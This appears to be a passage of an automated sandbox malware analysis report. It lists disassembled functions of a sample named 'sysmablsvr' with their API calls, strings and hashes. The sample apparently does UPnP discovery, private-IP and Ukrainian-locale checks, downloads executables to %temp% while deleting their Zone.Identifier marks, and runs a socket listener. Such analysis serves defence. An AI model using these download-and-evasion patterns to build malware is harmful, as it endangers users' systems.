                                                • Part of subcall function 0040D6F0: CreateThread.KERNEL32(00000000,?,00000000,?,00000000,?), ref: 0040D76F
                                                • Part of subcall function 0040D6F0: GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002), ref: 0040D7AC
                                                • Part of subcall function 0040D6F0: GetCurrentProcess.KERNEL32(00000000,00000000), ref: 0040D7B7
                                                • Part of subcall function 0040D6F0: DuplicateHandle.KERNEL32(00000000), ref: 0040D7BE
                                                • Part of subcall function 0040D6F0: LeaveCriticalSection.KERNEL32(-00000004), ref: 0040D7D2
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.1932691050.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000002.00000002.1931346301.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000002.00000002.1933493445.0000000000410000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000002.00000002.1933510145.0000000000414000.00000008.00000001.01000000.00000004.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_400000_sysmablsvr.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: CreateCriticalSection$Event$CurrentInitializeProcess$CompletionDuplicateEnterHandleInfoLeavePortSelectSocketSystemThreadbindhtonslistensetsockopt
                                              • String ID:
                                              • API String ID: 1603358586-0
                                              • Opcode ID: 23dfeb1008158e2e0cd7513cecaa842fef64be5ff76144f1ff25a44a66e0fb2a
                                              • Instruction ID: 5f4ab44496f95361e3b7ac477a06260d9546e6561ad256066a099106afd7ac33
                                              • Opcode Fuzzy Hash: 23dfeb1008158e2e0cd7513cecaa842fef64be5ff76144f1ff25a44a66e0fb2a
                                              • Instruction Fuzzy Hash: 2B41C070640701BBD3209F649D0AF4B77E4AF44720F108A2DF6A9EA2D4E7F4E445875A
                                              Function 0040DCA0 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 117networkstringCOMMON
                                              Download Yara Rule
                                              APIs
                                              • socket.WS2_32(00000002,00000002,00000011), ref: 0040DCBA
                                              • htons.WS2_32(0000076C), ref: 0040DCF0
                                              • inet_addr.WS2_32(239.255.255.250), ref: 0040DCFF
                                              • setsockopt.WS2_32(000000FF,0000FFFF,00000020,00000001,00000001), ref: 0040DD1D
                                                • Part of subcall function 0040B010: htons.WS2_32(00000050), ref: 0040B03D
                                                • Part of subcall function 0040B010: socket.WS2_32(00000002,00000001,00000000), ref: 0040B05D
                                                • Part of subcall function 0040B010: connect.WS2_32(000000FF,?,00000010), ref: 0040B076
                                                • Part of subcall function 0040B010: getsockname.WS2_32(000000FF,?,00000010), ref: 0040B0A8
                                              • bind.WS2_32(000000FF,?,00000010), ref: 0040DD53
                                              • lstrlenA.KERNEL32(00411D70,00000000,?,00000010), ref: 0040DD6C
                                              • sendto.WS2_32(000000FF,00411D70,00000000), ref: 0040DD7B
                                              • ioctlsocket.WS2_32(000000FF,8004667E,00000001), ref: 0040DD95
                                                • Part of subcall function 0040DE20: recvfrom.WS2_32(000000FF,?,00000400,00000000,00000000,00000000), ref: 0040DE6E
                                                • Part of subcall function 0040DE20: Sleep.KERNEL32(000003E8), ref: 0040DE7E
                                                • Part of subcall function 0040DE20: StrCmpNIA.SHLWAPI(?,HTTP/1.1 200 OK,0000000F), ref: 0040DE9B
                                                • Part of subcall function 0040DE20: StrStrIA.SHLWAPI(?,LOCATION: ), ref: 0040DEB1
                                                • Part of subcall function 0040DE20: StrChrA.SHLWAPI(?,0000000D), ref: 0040DEDE
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.1932691050.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000002.00000002.1931346301.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000002.00000002.1933493445.0000000000410000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000002.00000002.1933510145.0000000000414000.00000008.00000001.01000000.00000004.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_400000_sysmablsvr.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: htonssocket$Sleepbindconnectgetsocknameinet_addrioctlsocketlstrlenrecvfromsendtosetsockopt
                                              • String ID: 239.255.255.250
                                              • API String ID: 726339449-2186272203
                                              • Opcode ID: 67bb0c7a586e0ff2326b65c0e0cd249105ca887c7b19898e2fcb7942032de1f3
                                              • Instruction ID: 4840ad5dfb28dde6295409afe741e8bd11bfa900d245e54f0039e4319b19f377
                                              • Opcode Fuzzy Hash: 67bb0c7a586e0ff2326b65c0e0cd249105ca887c7b19898e2fcb7942032de1f3
                                              • Instruction Fuzzy Hash: 7C41D8B4E00208ABDB14DFE4E889BEEBBB5EF48304F108569F505B7390E7B55A44CB59
                                              Function 00401470 Relevance: 9.1, APIs: 6, Instructions: 89networkthreadCOMMON
                                              Download Yara Rule
                                              APIs
                                              • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 004014B2
                                              • socket.WS2_32(00000002,00000002,00000011), ref: 004014C1
                                              • htons.WS2_32(?), ref: 00401508
                                              • setsockopt.WS2_32(?,0000FFFF), ref: 0040152A
                                              • bind.WS2_32(?,?,00000010), ref: 0040153B
                                                • Part of subcall function 00401330: SetEvent.KERNEL32(6856006A,00000000,?,0040143A,00000000,?,?,?,0040DAED,00000000), ref: 00401346
                                                • Part of subcall function 00401330: WaitForSingleObject.KERNEL32(00401100,000000FF,?,0040143A,00000000,?,?,?,0040DAED,00000000), ref: 00401352
                                                • Part of subcall function 00401330: CloseHandle.KERNEL32(00401100,?,0040143A,00000000,?,?,?,0040DAED,00000000), ref: 0040135C
                                              • CreateThread.KERNEL32(00000000,00000000,00401100,00000000,00000000,00000000), ref: 00401569
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.1932691050.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000002.00000002.1931346301.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000002.00000002.1933493445.0000000000410000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000002.00000002.1933510145.0000000000414000.00000008.00000001.01000000.00000004.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_400000_sysmablsvr.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: CreateEvent$CloseHandleObjectSingleThreadWaitbindhtonssetsockoptsocket
                                              • String ID:
                                              • API String ID: 4174406920-0
                                              • Opcode ID: e01990b2806d481bb9ed450513fecbcb8920a32bd929df83c4378d56477af31e
                                              • Instruction ID: ab17557c7f530dee2ff78f8644a874c55f5dae77ec0fdd8d5eef9b2878869d10
                                              • Opcode Fuzzy Hash: e01990b2806d481bb9ed450513fecbcb8920a32bd929df83c4378d56477af31e
                                              • Instruction Fuzzy Hash: 6031C871A44301AFE320DF649C46F9BB6E0AF48B14F40493DF695EB2E0D3B5D544879A
                                              Function 0040D280 Relevance: 9.1, APIs: 6, Instructions: 67sleepnetworkCOMMON
                                              Download Yara Rule
                                              APIs
                                              • GetTickCount.KERNEL32 ref: 0040D292
                                              • ioctlsocket.WS2_32(00000004,4004667F,00000000), ref: 0040D2B8
                                              • recv.WS2_32(00000004,00002710,000000FF,00000000), ref: 0040D2EF
                                              • GetTickCount.KERNEL32 ref: 0040D304
                                              • Sleep.KERNEL32(00000001), ref: 0040D324
                                              • GetTickCount.KERNEL32 ref: 0040D32A
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.1932691050.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000002.00000002.1931346301.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000002.00000002.1933493445.0000000000410000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000002.00000002.1933510145.0000000000414000.00000008.00000001.01000000.00000004.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_400000_sysmablsvr.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: CountTick$Sleepioctlsocketrecv
                                              • String ID:
                                              • API String ID: 107502007-0
                                              • Opcode ID: 077c42ecd2642622499ea3213999ab9bc2a668583e8a55166bb8840c59880b72
                                              • Instruction ID: 4b62ca25e6cdc7f9b2e1b521222d8c0dfc3b1f9d22396e6cb4543525420831ef
                                              • Opcode Fuzzy Hash: 077c42ecd2642622499ea3213999ab9bc2a668583e8a55166bb8840c59880b72
                                              • Instruction Fuzzy Hash: 1F31E874D00209EFCB14DFA8D948AEEB7B0FF44315F108669E825A7290D7749A94CB59
                                              Function 0040B010 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 60networkCOMMON
                                              Download Yara Rule
                                              APIs
                                              • htons.WS2_32(00000050), ref: 0040B03D
                                                • Part of subcall function 0040AFD0: inet_addr.WS2_32(0040B051), ref: 0040AFDA
                                                • Part of subcall function 0040AFD0: gethostbyname.WS2_32(?), ref: 0040AFED
                                              • socket.WS2_32(00000002,00000001,00000000), ref: 0040B05D
                                              • connect.WS2_32(000000FF,?,00000010), ref: 0040B076
                                              • getsockname.WS2_32(000000FF,?,00000010), ref: 0040B0A8
                                              Strings
                                              • www.update.microsoft.com, xrefs: 0040B047
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.1932691050.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000002.00000002.1931346301.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000002.00000002.1933493445.0000000000410000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000002.00000002.1933510145.0000000000414000.00000008.00000001.01000000.00000004.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_400000_sysmablsvr.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: connectgethostbynamegetsocknamehtonsinet_addrsocket
                                              • String ID: www.update.microsoft.com
                                              • API String ID: 4063137541-1705189816
                                              • Opcode ID: 1adbfc87e4e946ee119d9e5b2ddfdf65343185abbb22bc100f48905234863ed2
                                              • Instruction ID: 0ae4650424ba83aa22eef998e17282091954cac8fd9820034268e2ac291e36ad
                                              • Opcode Fuzzy Hash: 1adbfc87e4e946ee119d9e5b2ddfdf65343185abbb22bc100f48905234863ed2
                                              • Instruction Fuzzy Hash: 4A212CB4D102099BDB04DFE4D946BEFBBB4AF08310F104169E515B7390E7745A44CBAA
                                              Function 004013B0 Relevance: 6.1, APIs: 4, Instructions: 63networkthreadCOMMON
                                              Download Yara Rule
                                              APIs
                                              • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,?,?,0040DAED,00000000), ref: 004013D5
                                              • socket.WS2_32(00000002,00000002,00000011), ref: 004013E4
                                              • bind.WS2_32(?,?,00000010), ref: 00401429
                                                • Part of subcall function 00401330: SetEvent.KERNEL32(6856006A,00000000,?,0040143A,00000000,?,?,?,0040DAED,00000000), ref: 00401346
                                                • Part of subcall function 00401330: WaitForSingleObject.KERNEL32(00401100,000000FF,?,0040143A,00000000,?,?,?,0040DAED,00000000), ref: 00401352
                                                • Part of subcall function 00401330: CloseHandle.KERNEL32(00401100,?,0040143A,00000000,?,?,?,0040DAED,00000000), ref: 0040135C
                                              • CreateThread.KERNEL32(00000000,00000000,00401100,00000000,00000000,00000000), ref: 00401459
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.1932691050.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000002.00000002.1931346301.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000002.00000002.1933493445.0000000000410000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000002.00000002.1933510145.0000000000414000.00000008.00000001.01000000.00000004.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_400000_sysmablsvr.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: CreateEvent$CloseHandleObjectSingleThreadWaitbindsocket
                                              • String ID:
                                              • API String ID: 3943618503-0
                                              • Opcode ID: b639d9fe06152c2b402f412d2fb95bf7c84a2e2683d3c9481316ca8ef9ae7b76
                                              • Instruction ID: d62f3833751a539e27b625c66b0fe154f308ce322b9d6d34e226f7a30690eb36
                                              • Opcode Fuzzy Hash: b639d9fe06152c2b402f412d2fb95bf7c84a2e2683d3c9481316ca8ef9ae7b76
                                              • Instruction Fuzzy Hash: 5C118974A40710AFE360DF749C0AF877AE0AF04B54F50892DF599E72E1E3F49544879A
                                              Function 0040ECC0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 22stringCOMMON
                                              Download Yara Rule
                                              APIs
                                              • GetLocaleInfoA.KERNEL32(00000400,00000007,?,0000000A,?,?,004075E8), ref: 0040ECD3
                                              • strcmp.NTDLL ref: 0040ECE2
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.1932691050.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000002.00000002.1931346301.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000002.00000002.1933493445.0000000000410000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000002.00000002.1933510145.0000000000414000.00000008.00000001.01000000.00000004.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_400000_sysmablsvr.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: InfoLocalestrcmp
                                              • String ID: UKR
                                              • API String ID: 3191669094-64918367
                                              • Opcode ID: 54f5cdf661095b57fe809351cef4458ab0cf24a1f510da97d06a6553b22e766c
                                              • Instruction ID: 77034b4ee665358b2559d06917653f26683f777e377fe2659d333d0cc479d80c
                                              • Opcode Fuzzy Hash: 54f5cdf661095b57fe809351cef4458ab0cf24a1f510da97d06a6553b22e766c
                                              • Instruction Fuzzy Hash: 19E02B32E4830876FA10BAA5AC03FEA375C9711701F000176FF05F21C1F6BA922A979B
                                              Function 0040F070 Relevance: 75.5, APIs: 37, Strings: 6, Instructions: 235filesleepnetworkCOMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              APIs
                                              • GetTickCount.KERNEL32 ref: 0040F079
                                              • srand.MSVCRT ref: 0040F080
                                              • ExpandEnvironmentStringsW.KERNEL32(%temp%,?,00000104), ref: 0040F0A0
                                              • strlen.NTDLL ref: 0040F0AA
                                              • mbstowcs.NTDLL ref: 0040F0C1
                                              • rand.MSVCRT ref: 0040F0C9
                                              • rand.MSVCRT ref: 0040F0DD
                                              • wsprintfW.USER32 ref: 0040F104
                                              • InternetOpenW.WININET(Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36,00000000,00000000,00000000,00000000), ref: 0040F11A
                                              • InternetOpenUrlW.WININET(00000000,?,00000000,00000000,00000000,00000000), ref: 0040F149
                                              • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000000,00000000), ref: 0040F178
                                              • InternetReadFile.WININET(00000000,?,00000103,?), ref: 0040F1AB
                                              • WriteFile.KERNEL32(000000FF,?,00000000,?,00000000), ref: 0040F1DC
                                              • CloseHandle.KERNEL32(000000FF), ref: 0040F1EB
                                              • wsprintfW.USER32 ref: 0040F204
                                              • DeleteFileW.KERNEL32(?), ref: 0040F214
                                              • Sleep.KERNEL32(000003E8), ref: 0040F21F
                                              • Sleep.KERNEL32(000007D0), ref: 0040F240
                                              • ExitProcess.KERNEL32 ref: 0040F268
                                              • DeleteFileW.KERNEL32(?), ref: 0040F27E
                                              • CloseHandle.KERNEL32(000000FF), ref: 0040F28B
                                              • InternetCloseHandle.WININET(00000000), ref: 0040F298
                                              • InternetCloseHandle.WININET(00000000), ref: 0040F2A5
                                              • Sleep.KERNEL32(000003E8), ref: 0040F2B0
                                              • rand.MSVCRT ref: 0040F2C5
                                              • Sleep.KERNEL32 ref: 0040F2DC
                                              • rand.MSVCRT ref: 0040F2E2
                                              • rand.MSVCRT ref: 0040F2F6
                                              • wsprintfW.USER32 ref: 0040F31D
                                              • DeleteUrlCacheEntryW.WININET(?), ref: 0040F32D
                                              • URLDownloadToFileW.URLMON(00000000,?,?,00000000,00000000), ref: 0040F347
                                              • wsprintfW.USER32 ref: 0040F367
                                              • DeleteFileW.KERNEL32(?), ref: 0040F377
                                              • Sleep.KERNEL32(000003E8), ref: 0040F382
                                              • Sleep.KERNEL32(000007D0), ref: 0040F3A3
                                              • ExitProcess.KERNEL32 ref: 0040F3CA
                                              • DeleteFileW.KERNEL32(?), ref: 0040F3D9
                                              Strings
                                              • Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36, xrefs: 0040F115
                                              • %temp%, xrefs: 0040F09B
                                              • %s:Zone.Identifier, xrefs: 0040F1F8
                                              • %s\%d%d.exe, xrefs: 0040F311
                                              • %s:Zone.Identifier, xrefs: 0040F35B
                                              • %s\%d%d.exe, xrefs: 0040F0F8
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.1932691050.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000002.00000002.1931346301.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000002.00000002.1933493445.0000000000410000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000002.00000002.1933510145.0000000000414000.00000008.00000001.01000000.00000004.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_400000_sysmablsvr.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: File$Sleep$DeleteInternetrand$CloseHandlewsprintf$ExitOpenProcess$CacheCountCreateDownloadEntryEnvironmentExpandReadStringsTickWritembstowcssrandstrlen
                                              • String ID: %s:Zone.Identifier$%s:Zone.Identifier$%s\%d%d.exe$%s\%d%d.exe$%temp%$Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
                                              • API String ID: 3526668077-2417596247
                                              • Opcode ID: 1100962fa89ef17564c5c36be3cff2d1b1833b9d6adaa76289525fa13b6591b5
                                              • Instruction ID: d1b69f2f4fd2238e53d437ba447cd35dd01203c47a8128eb559f47a2066d0ae0
                                              • Opcode Fuzzy Hash: 1100962fa89ef17564c5c36be3cff2d1b1833b9d6adaa76289525fa13b6591b5
                                              • Instruction Fuzzy Hash: 7691CBB5940318ABE720DB60DC49FE93779AB88701F0484F9F609A51D1DBB99AD4CF28
                                              Function 0040B430 Relevance: 34.7, APIs: 13, Strings: 10, Instructions: 198stringCOMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 496 40b430-40b447 call 40b360 499 40b449 496->499 500 40b44e-40b46a call 40afb0 strcmp 496->500 502 40b6d5-40b6d8 499->502 504 40b471-40b48d call 40afb0 strstr 500->504 505 40b46c 500->505 508 40b4d0-40b4ec call 40afb0 strstr 504->508 509 40b48f-40b4ab call 40afb0 strstr 504->509 505->502 514 40b4ee-40b50a call 40afb0 strstr 508->514 515 40b52f-40b54b call 40afb0 strstr 508->515 516 40b4cb 509->516 517 40b4ad-40b4c9 call 40afb0 strstr 509->517 524 40b52a 514->524 525 40b50c-40b528 call 40afb0 strstr 514->525 526 40b54d-40b569 call 40afb0 strstr 515->526 527 40b58e-40b5a4 EnterCriticalSection 515->527 516->502 517->508 517->516 524->502 525->515 525->524 538 40b589 526->538 539 40b56b-40b587 call 40afb0 strstr 526->539 528 40b5af-40b5b8 527->528 531 40b5e9-40b5f4 call 40b6e0 528->531 532 40b5ba-40b5ca 528->532 545 40b6ca-40b6cf LeaveCriticalSection 531->545 546 40b5fa-40b608 531->546 535 40b5e7 532->535 536 40b5cc-40b5e5 call 40da30 532->536 535->528 536->531 538->502 539->527 539->538 545->502 548 40b60a 546->548 549 40b60e-40b61f call 40a320 546->549 548->549 549->545 552 40b625-40b642 call 40da30 549->552 555 40b644-40b654 552->555 556 40b69a-40b6b2 552->556 557 40b660-40b698 call 40a740 555->557 558 40b656-40b65e Sleep 555->558 559 40b6b8-40b6c3 call 40b6e0 556->559 557->559 558->555 559->545 564 40b6c5 call 40b110 559->564 564->545
                                              APIs
                                                • Part of subcall function 0040B360: gethostname.WS2_32(?,00000100), ref: 0040B37C
                                                • Part of subcall function 0040B360: gethostbyname.WS2_32(?), ref: 0040B38E
                                              • strcmp.NTDLL ref: 0040B460
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.1932691050.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000002.00000002.1931346301.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000002.00000002.1933493445.0000000000410000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000002.00000002.1933510145.0000000000414000.00000008.00000001.01000000.00000004.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_400000_sysmablsvr.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: gethostbynamegethostnamestrcmp
                                              • String ID: .10$.10.$.127$.127.$.192$.192.$0.0.0.0$10.$127.$192.
                                              • API String ID: 2906596889-2213908610
                                              • Opcode ID: 5dde0825bd444be26dad4d2e0a68fa3133cd9c23aadc8b3786c6e5e0e51f72e0
                                              • Instruction ID: bd96892130d723efa302dbc8dbf9c53b9c7bf10ac090126f1a0951e43edd4a65
                                              • Opcode Fuzzy Hash: 5dde0825bd444be26dad4d2e0a68fa3133cd9c23aadc8b3786c6e5e0e51f72e0
                                              • Instruction Fuzzy Hash: 0C6181B5A04205A7CB10AF61EC46AAB7774AB10308F14847AF805B73C2E73DE655C6DF
                                              Function 00401920 Relevance: 29.9, APIs: 15, Strings: 2, Instructions: 138networksynchronizationCOMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 566 401920-401947 GetTickCount WaitForSingleObject 567 401ac9-401acf 566->567 568 40194d-401964 WSAWaitForMultipleEvents 566->568 569 4019f0-401a03 GetTickCount 568->569 570 40196a-401981 WSAEnumNetworkEvents 568->570 572 401a43-401a4c GetTickCount 569->572 573 401a05-401a14 EnterCriticalSection 569->573 570->569 571 401983-401988 570->571 571->569 574 40198a-401990 571->574 575 401ab5-401ac3 WaitForSingleObject 572->575 576 401a4e-401a5d EnterCriticalSection 572->576 577 401a16-401a1d 573->577 578 401a3a-401a41 LeaveCriticalSection 573->578 574->569 581 401992-4019b1 accept 574->581 575->567 575->568 582 401aa1-401ab1 LeaveCriticalSection GetTickCount 576->582 583 401a5f-401a77 InterlockedExchangeAdd call 40da30 576->583 579 401a35 call 401820 577->579 580 401a1f-401a27 577->580 578->575 579->578 580->577 584 401a29-401a30 LeaveCriticalSection 580->584 581->569 586 4019b3-4019c2 call 4022c0 581->586 582->575 591 401a97-401a9f 583->591 592 401a79-401a82 583->592 584->575 586->569 593 4019c4-4019df call 401740 586->593 591->582 591->583 592->591 594 401a84-401a8d call 40b0d0 592->594 593->569 599 4019e1-4019e7 593->599 594->591 599->569 600 4019e9-4019eb call 401cf0 599->600 600->569
                                              APIs
                                              • GetTickCount.KERNEL32 ref: 0040192C
                                              • WaitForSingleObject.KERNEL32(?,00000001), ref: 0040193F
                                              • WSAWaitForMultipleEvents.WS2_32(00000001,?,00000000,00000000,00000000), ref: 00401959
                                              • WSAEnumNetworkEvents.WS2_32(?,?,?), ref: 00401976
                                              • accept.WS2_32(?,?,?), ref: 004019A8
                                              • GetTickCount.KERNEL32 ref: 004019F6
                                              • EnterCriticalSection.KERNEL32(?), ref: 00401A09
                                              • LeaveCriticalSection.KERNEL32(?), ref: 00401A2A
                                              • LeaveCriticalSection.KERNEL32(?), ref: 00401A3B
                                              • GetTickCount.KERNEL32 ref: 00401A43
                                              • EnterCriticalSection.KERNEL32(?), ref: 00401A52
                                              • InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 00401A65
                                              • LeaveCriticalSection.KERNEL32(?), ref: 00401AA5
                                              • GetTickCount.KERNEL32 ref: 00401AAB
                                              • WaitForSingleObject.KERNEL32(?,00000001), ref: 00401ABB
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.1932691050.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000002.00000002.1931346301.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000002.00000002.1933493445.0000000000410000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000002.00000002.1933510145.0000000000414000.00000008.00000001.01000000.00000004.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_400000_sysmablsvr.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: CriticalSection$CountTick$LeaveWait$EnterEventsObjectSingle$EnumExchangeInterlockedMultipleNetworkaccept
                                              • String ID: PCOI$ilci
                                              • API String ID: 3345448188-3762367603
                                              • Opcode ID: 097e4152df7d5292a546001d94d6f32f43d0574f1127213a4449a66b8bd7891b
                                              • Instruction ID: 052bb906b72d623838b809fd2f084fe798b134d15a2779f83897d066d1444b79
                                              • Opcode Fuzzy Hash: 097e4152df7d5292a546001d94d6f32f43d0574f1127213a4449a66b8bd7891b
                                              • Instruction Fuzzy Hash: 3441F471600300ABCB209F74DC8CB9B77A9AF44720F14463DF895A72E1DB78E881CB99
                                              Function 0040EA80 Relevance: 26.4, APIs: 12, Strings: 3, Instructions: 138networkfileCOMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              APIs
                                              • memset.NTDLL ref: 0040EAA8
                                              • InternetCrackUrlA.WININET(00009E34,00000000,10000000,0000003C), ref: 0040EAF8
                                              • InternetOpenA.WININET(Mozilla/4.0 (compatible; UPnP/1.0; Windows 9x),00000001,00000000,00000000,00000000), ref: 0040EB0B
                                              • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 0040EB44
                                              • HttpOpenRequestA.WININET(00000000,POST,?,00000000,00000000,00000000,00000000,00000000), ref: 0040EB7A
                                              • HttpAddRequestHeadersA.WININET(00000000,?,000000FF,A0000000), ref: 0040EBA5
                                              • HttpSendRequestA.WININET(00000000,004120C8,000000FF,00009E34), ref: 0040EBCF
                                              • InternetReadFile.WININET(00000000,?,00000400,?), ref: 0040EC0E
                                              • memcpy.NTDLL(00000000,?,00000000), ref: 0040EC60
                                              • InternetCloseHandle.WININET(00000000), ref: 0040EC91
                                              • InternetCloseHandle.WININET(00000000), ref: 0040EC9E
                                              • InternetCloseHandle.WININET(00000000), ref: 0040ECAB
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.1932691050.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000002.00000002.1931346301.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000002.00000002.1933493445.0000000000410000.00000002.00000001.01000000.00000004.sdmpDownload File
                                              • Associated: 00000002.00000002.1933510145.0000000000414000.00000008.00000001.01000000.00000004.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_400000_sysmablsvr.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Internet$CloseHandleHttpRequest$Open$ConnectCrackFileHeadersReadSendmemcpymemset
                                              • String ID: <$Mozilla/4.0 (compatible; UPnP/1.0; Windows 9x)$POST
                                              • API String ID: 2761394606-2217117414
                                              • Opcode ID: 8a56ad483b9ace5c80fef8412a232ec04f9eaa1d9d9d993c01397f9ec31f5831
                                              • Instruction ID: c905a0693736bdbf34c7f8e0e7db626079e62ceb693e66bb4324beed71749724
                                              • Opcode Fuzzy Hash: 8a56ad483b9ace5c80fef8412a232ec04f9eaa1d9d9d993c01397f9ec31f5831
                                              • Instruction Fuzzy Hash: 33514CB5901228ABDB26CF54CC94BDDB7BCAB48705F0481E9B60DA6280C7B96FC4CF54
                                              Function 00405910 Relevance: 25.7, APIs: 17, Instructions: 186clipboardregistryCOMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
